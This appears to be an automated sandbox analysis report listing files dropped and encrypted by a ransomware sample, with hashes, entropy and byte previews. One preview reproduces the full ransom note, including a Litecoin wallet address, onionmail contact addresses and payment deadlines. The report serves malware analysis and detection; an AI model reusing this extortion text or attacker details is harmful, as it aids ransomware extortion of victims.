                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):921296
                                                                                                                                                                                                                                                Entropy (8bit):7.159692274985754
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:ZXEA6Zu3WYB0yRV0GZzcgyxUbCPnImH52jW5dE6Z4Mabo:CLZsWH+V0GuHMjWomaU
                                                                                                                                                                                                                                                MD5:C93E6601266EB7C6A9CC1779E55EA2DB
                                                                                                                                                                                                                                                SHA1:549966CCE53A8C00E9AF8BE3ADB2179FC870EF80
                                                                                                                                                                                                                                                SHA-256:E6F3A12A3F8D30CC3378A5D22AA618224EEA3BC51E1ADCEF9FD3D7215F9235A8
                                                                                                                                                                                                                                                SHA-512:ED761D9254BAA8587CCE82CB48349E4A64CFC31D528DBEBEF0211E2B604417BF3BB478C9BF56CC9DD9B71F9A46BB66446406B92930CF8A764AFB3B18A840DF75
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..z..0...YY.`....[...}..2.....N..<.....m...a.P[..*L.v.A....e_...L.}.".Y.........x....$..A...H......a..5.0I......u.$......b.3J.}d.t.HF...F....S.e..+ZI..../E'p.....rDy.....R..&{...-....<h......o}....)..KF7Vt.....nC..x..u....A..H/.].....i.lU9.5.....?.2.c&.[O..-......I..C...,k.........U[...-.0!N...G...I....?o..........O.&.....%.]<.+.....<.&..h!i....s..(V_.T.......kA;.IV...N0..$4Bm`.l...u....v..I...@F2.=.3...{a.....^.....e......uz.Y....e....}.Iw~.?<...T..,....`....O.3..OU.|w...(.......se.0H.....m....dh.v..B]2,..~..]..A...'.'..>;@..E..F.*_.u.ZY.7.Y.+....`&.Vd,J.%..X.[.h.7./......Q..5......y.x-..A~?.....j..........O.O....C..\....X.=NlN..}x@....D.<.<.........../7.)...\..zN.....BE......tL/a...#.a......do..s...E@..3C.o...'.....4.......:J...l'..4M.......G\..<n..}..+.............a|Zu%N.E....R-.....wW.~.s..d..4.........B..jB.v;..E....y...n...=.[....E..R..@,s...8..#...?...2P........"_``fez..b..(....#..P.`...r."m.Q^@]C."......no...L.Z....$2.....].

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3_x64_DLL.lib

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):28154
                                                                                                                                                                                                                                                Entropy (8bit):7.9941771939413435
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:768:qUFQHLMWMFYRST/RbawLVq6cZ9DQ5IS4ic:LFQHoWMhT/FawLVq601QOd
                                                                                                                                                                                                                                                MD5:259ACBB9FD4FE30714F412885C1D8FE7
                                                                                                                                                                                                                                                SHA1:FD7DAF0302C33934C908CE9793FA5CE2E64EAECD
                                                                                                                                                                                                                                                SHA-256:ADCF132E7E4F98E1134E09C55A5B1EF5D1EA076DC315CCFF999BCD1568B67122
                                                                                                                                                                                                                                                SHA-512:EBD64F16553F4BBE0BFF7BE92DFB8D14A892FF39CF8F6DB3262172F6F08F55B8653CCC3248D3218EE43CE8AED31FBB9895ABA7DBACD8D8C9C043BE4931BACECC
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:5'..-.*...- .KL..#..6.iR,<Z.....`.qa.b..%....g.p'}....cx.s..b..G.h.3u..:......8[cv...x...<{....7...A.q.!..<[i)T.J.J..B.*..*..Qwu.yV..D...%E.!i.M.d..G..c...{..P..u.....P.....[~..m$Z.0JU.v.O+|.....(.......^.3.0.gH..1.....C0....@..Fz.=......=w.G..zf.....4....w.y'.]S.:'....o. .......R.V'sf.....&.'.v#...r.W......%..gJn..`..B.7.r~6g@?4*|..P.0'....Uv.X.........F.wZ.....KY.#..J....9..0..eF=...[.....[a+.e5Z.n...@.T.........."....=.M^a.!....m.>..;....1.9....Q~9.B..5Y...a.k<u:.5.~k+0.....8.:.a-$2...m..+S...3.....5......cMD...o.I..8.....l_h.Q..s....4.S./.V...............&..z{.$R.f.F....."9i.h.z.GjZZJ.>..J..G..P.p.U.'W...*."Q........3.sR...YZ.P/.-W.X.u....K....,..^...5c=....!.Z.~_.......e...M.9[...E.....7...B..A.=.K..B.../..C`..>RmV.?...T....E..%.n8^T..g.B......H[..d.c....Y..(R...5.[.i.yr..'5.l[6J....o..]qD.....O./......YC..{..m....z....<.....6 .\..].r.._. .tp/...+.......M.l.7........>.e?......[.E...)..,......)+.iG)..8k..p.$..f..Yw.A9....x..-..T.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\GUI\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\@OSLang.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1781
                                                                                                                                                                                                                                                Entropy (8bit):7.882086994988941
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:ESDGHa5crnJzCL0khs2cYxk4yZo34o0jZtwq:EVHmOJzCL0khssxkrleq
                                                                                                                                                                                                                                                MD5:86604CD773C41757D74818D3A741EE5E
                                                                                                                                                                                                                                                SHA1:C10ECB25D3804FE2DCC3599F5A0609550F3F1A2E
                                                                                                                                                                                                                                                SHA-256:535D0198067BFF67CC7BBF8A4283737B6D756B0C3741AB3035E6370F1688F136
                                                                                                                                                                                                                                                SHA-512:3A7D44EDCF5A43959EDD2668767964F7B0A319A8E78A2A7DF150FCA2A6EEA5A1991471736456101E47571F0BFED8CE06A7F8D2B53A330F23635EE6F9C735F9DF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Y0P....~..J.....GE+..8..N0...f....h.8.O.&...-...5K.V3.[.?..@.p.....t.L-4^.....8. Lh..wN...5...V.......p......kK.,.ktF.(.).....v...hD1..'.4....\-.b...F"....g...5....jM........+_Q?yF..F..%......uQ..E.e(n.;u.Z}.v....Squ....8.]..0..l....Sl..u........&...=..R..4wo..T...x."J.@.o..Ju..f..0c...c...T.X.....21...Ya..p;...i.&.g.\.I..U)n|.j..J.......lX../ ...id.h|v...M.q.A...:..u7..L,$.G.-Xml..Ky.p..:./..C..]....}.d2w.c..Q.[...... .VQ.}...J...N....`a...W.......H...;.....t>\<....h....ah...a.a.i\..G..".r.y...xn..k.s.h..AU..UCy.e.Rb.h.z...D...z...N...?wGcW.O.,....P.,.....j.#.!d.i.....?[...-}6..T{.0...6.d.,.... Y......5.=(W0**...Y.L..E.Pt.9..1..Q.@....5c..H...W;4._.~..3......;......yw}.....Gg..,J...z...o...Y.E+......[r....3...b.t".D3......s.=.b...PK.g=/N>.Agn^W....ak.........9n.>".<l...P..f..*...5.C8..D.*'.p.p.x.....|.LE.. .n.yV...56..9....;.C*.......3.0~.f.....WD....l.1R.A8...".7I]D..].P..NY.....m....'.m..`.T.<.\2.....c8..x...zhb........Zu...wD..O.>~L

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\ACos.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1263
                                                                                                                                                                                                                                                Entropy (8bit):7.835754031405204
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:PPX9KKrhcztkANuFQ4SdW23IgFmjmJrc0YXUZtwsTHpc:nX91+pkSuelW2384o0jZtwAG
                                                                                                                                                                                                                                                MD5:B2329A4241CFF216739591273E3FACE3
                                                                                                                                                                                                                                                SHA1:29916377425779EE3B98A7EB23FDBEC2A9DD3AB5
                                                                                                                                                                                                                                                SHA-256:7637210E9C74C905656142EB5273BFBFDE5F90E4FB307360683BC9C6151088D1
                                                                                                                                                                                                                                                SHA-512:795656BD111F33F7BB5A14235585DF6202A28E824F17E5352894AACE490F8AB260D25C61C427805922BB22C72CE89AE8EEF3DD061C5D4F52DF0EA4A2553F0803
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.A.z......X..$.K..Z.e....ct.a#..]..W.y./..s...).W..!...\:uXb...G.0..T?.......<4h.aC....GD.~..=..H..RJA.\-~..8..2.t.....}..(.X..{.@U..HT3|.V.X.T.b....>.........(*...Gh..x.2?t..aW..s.+....g1...ma!2FSB..#Ja....H(....#...A.>h.c.IE.......%J...S...:...!.. .3{....h.-x./!^..r.F.]N.......k..n.a.....6.r..;..$................W..%OhhI..54k...;.^Bt...~......W.....d.o......r....J......$.MS%b.J8?w...a,.#..0...O$...J..$...D|.B..~:.BZ.mB.a.K..8b..5.=.s..*....3..1.H..?.a......n.Bc....&..LYs!.-#.*....... .JD......Q..@|..~7.A....f.....L....I/....F..4a.L...(..c.....C.../0\.C.s.......jlu.5.P]...RI..g..,i........?....LGi42.......D....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'....

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\ACos[2].au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):813
                                                                                                                                                                                                                                                Entropy (8bit):7.6875903158358865
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:THtHugWbcG/XWzU6jaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZohs:9lbokjmJrc0YXUZtwsTqfQM4
                                                                                                                                                                                                                                                MD5:5D540F528431F242A04FF2B337D50714
                                                                                                                                                                                                                                                SHA1:C9CF25B1BF4C606B9C5B5BB9C7E3B62A7F83B303
                                                                                                                                                                                                                                                SHA-256:9196B0F5803ABE00B2924BCEF2A31F7EB1AE93BC1E57DAE11C8BFB8C1AAC5003
                                                                                                                                                                                                                                                SHA-512:DD2DF3B0DAEE64485BE5DE113AC513890223359D2912DB8E19F63661F11450449823878DDEDD147029052A904E278C3ACC5F12A2397C10953453BBCB3B6A1C31
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.Sy...N........5....2B.....|".#O.&..\..M}..pI_....B..rp;/..|b.Q..5.m).SV..[.V........gPoP....f.=.+...3.u......:..6=;.<t....G|XSN..\B9.j*..h.u.X...@.E9...t.d%..`..rf......+......w......)......I..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$...:W.M.j5o..C$...S...f%..v.vKj......................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\ASin.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1260
                                                                                                                                                                                                                                                Entropy (8bit):7.845461406947237
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:sV0rI5ZZSuUaO0BqTMBvGwtzgsg9jmJrc0YXUZtwsT6:ZE2uUt0c+7gH4o0jZtwt
                                                                                                                                                                                                                                                MD5:466A0DC1A1352E1978CF0E0B4CA17C98
                                                                                                                                                                                                                                                SHA1:D7EDC880F9C21A95F6D543189A9765B6135035AD
                                                                                                                                                                                                                                                SHA-256:DBEC972DC70468E624309248C361CCF77C78FEC2085F8126BF60E5CAB2AFD173
                                                                                                                                                                                                                                                SHA-512:D0B6469183DB7BFEF807A538C59D30ABAA9C61653C9D68676DA33BD2B58C2C276E9FDC0F0C5E296A16275A96F933D9FDC0B0B9E8A8724E22811013563BAF7BA3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.p..|"N.:4.m.....Ai).C..j.5.)h.[.bE.....s...o*.+..(F....q.}42GN.Fg.:......7.".|.Wi.J4.**..!U..Wq5...+.+p.W.p.QO.u8).....=......%.1S.c......F.\J3H.f\.[..qt$.4R....%WJo.......YC...J...b.t.o.-J.zC..1m..I....+..Y|.T...g.#.c..Kg.*:3.G...s.A.Py....G.s.}l..L.../1."..d....H!....o$....U.....-./..._P.....H#A..k..... 8..a..........R&..].".QW.......`].<.|..L....w.wC..3U__..z.....u..'.v.;...GOz|.H.%.v.....K.u..8...m|.`..g....R.F.>R8.d....M....B_f..$t........s.....94C.oS..m_....Shf3H.9a,G....q....~...]..w...oA....gb}q...~.~.W...u.;...'(?.|_,...mQ-........+0.-....*.AOm.Y.y.].H..P....D.......?.X.<z.).}.d..V.V0A .._....:r3...3.....5.0...Z.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\ASin[2].au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):814
                                                                                                                                                                                                                                                Entropy (8bit):7.720540014450463
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:ovNsrt+Oj9+BB6d74jaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZQW:btFQUyjmJrc0YXUZtwsTzh
                                                                                                                                                                                                                                                MD5:12FEB611E5CDCED1A8E9901EF230A1D1
                                                                                                                                                                                                                                                SHA1:94234E95F7B4ABD5366EC27E399ADA9396C7DDC8
                                                                                                                                                                                                                                                SHA-256:F8F2127F6D212846396A22F24247882610263552F83CDD02493B87B24E8E8A03
                                                                                                                                                                                                                                                SHA-512:F34552942B5D15AB2B99BDC993A48324A1C8CA8080BB5F09972A9F040A1BC1B95EF045FC184CA513480ABA48B295F1ACCDF284C263464E120C3D9706073EBEF5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..P....3...F.hcE..r..Yz..a.!.#..^..C*....C0.....7=.AG.......K.:.H..|A.P#N.&P.4...Z..I.....G....U..D.QV......R./o....KH....(......mS.J......U..3...%8i....r.....%]P...H...5.B..z...\...5-.....&....\8.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.p\......cU....k:.}^.r....|wk.m.qrr.l....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\ATan.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1263
                                                                                                                                                                                                                                                Entropy (8bit):7.843815645892645
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:mscDtVtJGSHtYCGBNWirMuONr0ljmJrc0YXUZtwsTKUa:m1PtYCGKiAuW0N4o0jZtw9
                                                                                                                                                                                                                                                MD5:38A0F7643DDEC17D6A3BC65322836441
                                                                                                                                                                                                                                                SHA1:8249AB9F9074FA8119036F29CE0761E6D949EEDB
                                                                                                                                                                                                                                                SHA-256:B2659E66FA6544492CACFB9EF89E5BA652F64215B67B703A7D086DDB1AC55CBD
                                                                                                                                                                                                                                                SHA-512:6D82D4E0342EF5491A837174345D364A5BD39D0706526C562DB4D6C699D541A387C586FBB4F3624D5F197E299CFE4CC3C113B6F8ED0648A6127DDBDADEAEB207
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:*...r..D....f#3~U..:J..~..k.....L....,$.m..n.0.D..kz..(..6.L5v..%"J:...3E..L...e.T.)...9.-...b.w3o.M.._.J.*..{(..4K.n)........;.$b.......a....m.W...{....h...s...u......0k9..E#...K.......j...H+.I.G......_....=~....*Z?...*.:.........w.....B.t.gk<d....}.+N...@z.6#.T9...gE.?uC._...m...Z..G...........l..zUI...$..H....Q...TL...q...|5.wY..%...W42.e.x..6..xD...o.......p..b.cX...o.lJ.F.}$0j'KJU.L8.......^*h.>8=......`.+!.*^..w#&^..<..<O..e^....So......'/.|...........1\2.G.i.8x.L{...2:..t#...G5...O.i~p..cC7t.0S..\.....P..O~X.cZ"l...1..p.a8..].l..8.~1T....-...*]s.:eu}..q...T....J.}.....2..n........._z....7.r)Dc|..1...u..]......>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'....

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\ATan[2].au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):810
                                                                                                                                                                                                                                                Entropy (8bit):7.732744481196617
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:IY9rAEI78AYTpw1o24rFrH252jaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXA:IY9kYOydW52jmJrc0YXUZtwsTvY
                                                                                                                                                                                                                                                MD5:B8445442F8E359E05E0E90A022CCFDAF
                                                                                                                                                                                                                                                SHA1:B78B0D48660560EB8CF73A4D0CCD94B23E8F077C
                                                                                                                                                                                                                                                SHA-256:EAA1EBACC3343FCF4AC32B6F17DBC9D4870C3DD6116261DF4A69F2F651B2AEAB
                                                                                                                                                                                                                                                SHA-512:1FB5A79302D9FC0FE3024D5D6C2B20F7678280C1242EF8840674555CFBF6A235E48E7BC82D5FCCB914F7EC8B9B38A9F4F4D267FA2055AA64BE447CA048F3D32F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..\...._(...p..+.2.!d..a.=v.....h.zV....@..u.l.;.a.).'.\X..a..>...<0 .Y..x/..<.Q.{.q...b.,..w.?.k..&.o...`.G.SmT.......'.+.0.Y."6..8..a...*Q....T..<J.~yflm..N.;...1_j,.-t.g..U..."......v..M.xL.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.k....U.cP..`.Ws'|n...FYkG2.CE+r.E.O....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Abs.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):755
                                                                                                                                                                                                                                                Entropy (8bit):7.680384102009174
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:1UFTQd1Aho92jaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZofhm4ku:1UFs1Ah42jmJrc0YXUZtwsTE5
                                                                                                                                                                                                                                                MD5:C2BD90D21ED1C5FA077854D81F9ACBE9
                                                                                                                                                                                                                                                SHA1:7E060290AE23D42D4E95B323A88C175CF46E858C
                                                                                                                                                                                                                                                SHA-256:F5EC9050E00E11FD43ED1FBD90DE7DC1ECB8B650FA8D185C9C3ECC75D7540E00
                                                                                                                                                                                                                                                SHA-512:5D0FE188C6C6FAD2F83141F96EC08570EF2E4007EA64216A34C2BD7115A1D34F56F96F4C2D121C5E5F261746C675BDBED94003A6C4280049E12B050BCDD79631
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.u.....9=.-..@..|n..4.;..G.~..YO,3..;.@..D....P.M..^...9...H..6i*.....a.8-@D.#x...:...T.X.k....A.S...Bs.dU...3...|?.......!.?..Zf.".a..|.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.e.G~../$...&i.r....\.GB.<"3ZjDG...L....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\AdlibRegister.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1664
                                                                                                                                                                                                                                                Entropy (8bit):7.872443730454361
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:+3qhR777ts1K7ayNDDBPh8NyStOZ2xKPTch4fEWFjmJrc0YXUZtwsTuI:+3677ZPDdPeySqbEWt4o0jZtwVI
                                                                                                                                                                                                                                                MD5:F9E8E506A0970D0D011E0EA8FFFF5B12
                                                                                                                                                                                                                                                SHA1:DFCDDD1DE221258A5D5BAB4B3F7D6377CAFB51AD
                                                                                                                                                                                                                                                SHA-256:850CE6314BAFFB3C80BB4BE3A87F159E09B977660B5CD7173645D647A3218E66
                                                                                                                                                                                                                                                SHA-512:23E554353C00C45D8492B515CB6B1CD7FB8E5F0EA79F21ABCBCC309F9AB0D89CBBD87A80D9F910EC831989AF22B8FE1D2F066C0921E6CAF4CE8627AFF3332EB9
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:(....4.e....D..c.h..6.2..UY...nY.%...a.S..G.=f..P..5.W..C..5...0...[[qA@..........wbPf...@lU.Pz....@x.D.|O......r....3.V.....M..B..4..'.d+..~..0..s.......G......,.......X.S...k=....F>*i7.i..t..#....w5.4.i,..V.....b.;.r....y.'...c..'.e'.Z=......R..8..m..o.:..`i.O.L$`..T..I......B.$..<..Y9.._......&...1..'!.i..zs.a.....*.|p.Z.../.mZDqx..s.(O....^..mR.b.Y._....T?8...H.Qs...W..mnH.3..9......X.`B..w.. ...P.G".gczb...../40...A.8.q..Z..c....'.W..C.JU.U........u..^....'..+..`'..y...=...U5.$..:.o..P...c..^......F.d0Noq3.U3.k.=.ez=.!.H..q]..T.<......d....J_......8@...M5.rH... ...=T.O...=..@dw..Z.......o.'...a...F...m...."...W.A^....W...#........#.....4..].._.<(..h..M#..Tf..+k.vGX..G>.j..4g...h..~....xO...F .Sd.....?}.Nl...~f....q//M[..x".../...i`...F..1.i........._..K<...CQD6A.F... .{.\.......L.y~..u.I.. ..q..\..6...p$..Y.......9.3...t........_......^.......\..<V...|.^.c.!.<..Akg.C......9y.4z..@#.b......).!..C..'..nh{..it.....i.y...:..|.F....

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Asc.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):727
                                                                                                                                                                                                                                                Entropy (8bit):7.69858877149246
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:S53DFjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZBBxku:S9FjmJrc0YXUZtwsTFBR
                                                                                                                                                                                                                                                MD5:16497348124F0F97BEA5424B8A9B7711
                                                                                                                                                                                                                                                SHA1:AE6F9139846C1A683A44DAF8A5DD2FF9DC5AD707
